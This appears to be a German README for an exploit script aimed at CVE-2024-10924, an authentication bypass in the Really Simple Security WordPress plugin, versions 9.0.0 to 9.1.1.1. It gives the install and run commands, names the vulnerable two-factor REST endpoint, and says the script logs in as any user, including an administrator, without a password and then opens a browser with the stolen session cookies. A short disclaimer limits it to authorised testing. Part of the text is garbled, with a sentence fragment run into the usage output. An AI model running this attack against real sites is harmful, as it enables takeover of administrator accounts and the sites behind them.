
Really Simple Security (Free, Pro und Pro Multisite) 9.0.0 - 9.1.1.1 - Authentifizierungsumgehung
Really Simple Security (Free, Pro und Pro Multisite) 9.0.0 - 9.1.1.1 - Authentifizierungsumgehung
Dieses Skript nutzt eine Schwachstelle im Really Simple Security Plugin (Versionen 9.0.0 - 9.1.1.1) für WordPress aus. Der Fehler ermöglicht eine Authentifizierungsumgehung aufgrund einer fehlerhaften Fehlerbehandlung in der Funktion check_login_and_get_user der Zwei-Faktor-Authentifizierungs-API.
Mit diesem Exploit kann sich ein Angreifer als beliebiger Benutzer (z. B. Administrator) anmelden, falls 2FA aktiviert ist. Nach erfolgreicher Authentifizierung startet das Skript automatisch eine Browser-Sitzung mit den erlangten Session-Cookies.
Stellen Sie vor der Ausführung des Skripts die erforderlichen Abhängigkeiten bereit:
pip install requests selenium webdriver-manager
python CVE-2024-10924.py -u http://ZIEL-WEBSITE.com/
/wp-json/reallysimplessl/v1/two_fa/skip_onboarding
/wp-admin/ weiter und gewährt Administratorzugriff ohne Passwort.usage: CVE-2024-10924.py [-h] -u URL
WordPress Login Exploit | Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication
Bypass
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL
Dieses Skript dient ausschließlich Bildungszwecken und autorisierten Sicherheitsbewertungen. Missbrauch dieses Skripts kann rechtliche Konsequenzen haben. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Tests an einem System durchführen.